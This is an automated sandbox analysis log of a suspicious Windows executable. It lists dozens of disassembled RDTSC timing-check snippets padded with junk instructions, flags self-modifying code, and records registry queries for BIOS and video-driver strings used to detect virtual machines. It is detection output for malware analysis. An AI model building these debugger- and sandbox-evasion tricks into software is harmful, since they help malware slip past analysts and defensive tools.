    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9911 second address: BB991B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB4CD3D7AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9A5C second address: BB9A80 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jc 00007FB4CD146836h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pushad 0x00000010 jns 00007FB4CD14683Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9A80 second address: BB9A84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9A84 second address: BB9AA0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FB4CD146841h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9ED4 second address: BB9EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB4CD3D7AA6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f jmp 00007FB4CD3D7AB3h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC0CC6 second address: BC0CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC0FF2 second address: BC0FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC0FF8 second address: BC0FFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC15B4 second address: BC15E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB4CD3D7AB9h 0x0000000c jl 00007FB4CD3D7AA6h 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC15E2 second address: BC1608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FB4CD146850h 0x00000010 jmp 00007FB4CD146844h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC1608 second address: BC161C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4CD3D7AB0h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC18B4 second address: BC18B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC1E4A second address: BC1E6D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB4CD3D7AAEh 0x00000008 jns 00007FB4CD3D7AA6h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB4CD3D7AAFh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC1E6D second address: BC1E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC23C0 second address: BC23C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC26C9 second address: BC26DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB4CD146836h 0x0000000a pop eax 0x0000000b jo 00007FB4CD14683Eh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC5D18 second address: BC5D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC6270 second address: BC6275 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC63DB second address: BC6410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 je 00007FB4CD3D7AA6h 0x0000000b jne 00007FB4CD3D7AA6h 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jno 00007FB4CD3D7AC0h 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC653C second address: BC655B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD146846h 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD428F second address: BD42E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD3D7AABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FB4CD3D7AAEh 0x0000000f popad 0x00000010 pushad 0x00000011 jno 00007FB4CD3D7ACBh 0x00000017 pushad 0x00000018 jl 00007FB4CD3D7AA6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD25BB second address: BD25BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD25BF second address: BD25CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FB4CD3D7AA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD2B91 second address: BD2B9B instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB4CD146836h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD2B9B second address: BD2BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 ja 00007FB4CD3D7AAEh 0x0000000e push edx 0x0000000f je 00007FB4CD3D7AA6h 0x00000015 pop edx 0x00000016 jmp 00007FB4CD3D7AAFh 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FB4CD3D7AB0h 0x00000022 jmp 00007FB4CD3D7AB2h 0x00000027 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD2BEC second address: BD2BF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD2D11 second address: BD2D15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD312E second address: BD3141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jp 00007FB4CD146836h 0x0000000c popad 0x0000000d pop esi 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD32A5 second address: BD32AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD32AC second address: BD32CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007FB4CD14683Ah 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD2042 second address: BD2050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 js 00007FB4CD3D7AA6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD2050 second address: BD207D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB4CD146836h 0x0000000a popad 0x0000000b pop edi 0x0000000c pushad 0x0000000d jmp 00007FB4CD146841h 0x00000012 ja 00007FB4CD14683Ch 0x00000018 ja 00007FB4CD146836h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD207D second address: BD2083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDC096 second address: BDC09C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDC09C second address: BDC0A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDC0A0 second address: BDC0BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4CD146845h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDC0BB second address: BDC0C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDC0C1 second address: BDC10E instructions: 0x00000000 rdtsc 0x00000002 js 00007FB4CD146836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007FB4CD146865h 0x00000010 jmp 00007FB4CD146847h 0x00000015 jmp 00007FB4CD146848h 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FB4CD14683Ah 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDBCAA second address: BDBCC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD3D7AB5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDBE3C second address: BDBE40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEA54B second address: BEA555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB4CD3D7AA6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEE3FF second address: BEE429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4CD146849h 0x00000009 push edi 0x0000000a pop edi 0x0000000b jbe 00007FB4CD146836h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEE429 second address: BEE42D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEE42D second address: BEE431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFD4ED second address: BFD520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4CD3D7AB8h 0x00000009 pop edx 0x0000000a pushad 0x0000000b jmp 00007FB4CD3D7AB3h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFD520 second address: BFD526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFD3C6 second address: BFD3CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0705E second address: C07062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C07062 second address: C0707D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB4CD3D7AB3h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C059E4 second address: C05A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FB4CD146847h 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C05F88 second address: C05FA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB4CD3D7AB3h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C05FA1 second address: C05FAB instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB4CD146836h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C06276 second address: C0628B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB4CD3D7AADh 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0628B second address: C0628F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0628F second address: C06299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C06299 second address: C062A3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB4CD146836h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0A9A9 second address: C0A9AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0A9AD second address: C0A9CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB4CD146849h 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0A9CC second address: C0A9DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB4CD3D7AADh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0A578 second address: C0A584 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0A6F3 second address: C0A6FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB4CD3D7AA6h 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0A6FE second address: C0A70F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FB4CD14683Bh 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0A70F second address: C0A71C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C178B3 second address: C178B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C178B7 second address: C178BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C178BB second address: C178C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C14C71 second address: C14CAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB4CD3D7AB2h 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007FB4CD3D7AAAh 0x00000014 jp 00007FB4CD3D7AB2h 0x0000001a push eax 0x0000001b push edx 0x0000001c push esi 0x0000001d pop esi 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C14CAF second address: C14CB9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB4CD146836h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C26E44 second address: C26E50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FB4CD3D7AA6h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C29AD6 second address: C29AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jc 00007FB4CD14683Ah 0x0000000b push edi 0x0000000c pop edi 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C296A0 second address: C296A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C29813 second address: C2981F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnl 00007FB4CD146836h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3E6BC second address: C3E6C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FB4CD3D7AACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3E6C9 second address: C3E6CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3E6CD second address: C3E6D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FB4CD3D7AA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3E841 second address: C3E877 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD146843h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB4CD146843h 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jg 00007FB4CD146836h 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3E877 second address: C3E87D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3EA23 second address: C3EA37 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jo 00007FB4CD146836h 0x00000009 jp 00007FB4CD146836h 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3EA37 second address: C3EA3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3EBBC second address: C3EBC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3F03A second address: C3F040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3F040 second address: C3F044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3F16A second address: C3F186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB4CD3D7AB5h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3F2CF second address: C3F2D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C40EA1 second address: C40EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C43C43 second address: C43C82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB4CD146841h 0x00000008 jnl 00007FB4CD146836h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 or edx, dword ptr [ebp+122D3891h] 0x0000001a push 00000004h 0x0000001c pushad 0x0000001d mov dword ptr [ebp+122D30ECh], esi 0x00000023 sbb di, 294Dh 0x00000028 popad 0x00000029 push BC0C3B9Dh 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 push esi 0x00000032 pop esi 0x00000033 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C43E8A second address: C43E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jo 00007FB4CD3D7AACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C43E97 second address: C43EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ebx 0x00000007 jo 00007FB4CD146838h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 nop 0x00000011 sub dx, 4B68h 0x00000016 movsx edx, di 0x00000019 push dword ptr [ebp+122D1DA6h] 0x0000001f or dh, 0000000Bh 0x00000022 jmp 00007FB4CD146846h 0x00000027 push 5584F5D3h 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FB4CD146848h 0x00000033 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C43EEE second address: C43EF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C48B50 second address: C48B7B instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB4CD146836h 0x00000008 ja 00007FB4CD146836h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB4CD146846h 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C48B7B second address: C48B84 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C48B84 second address: C48B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Tries to evade debugger and weak emulator (self modifying code)
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9AC9B2 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9AA42A instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B65498 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9AC90A instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
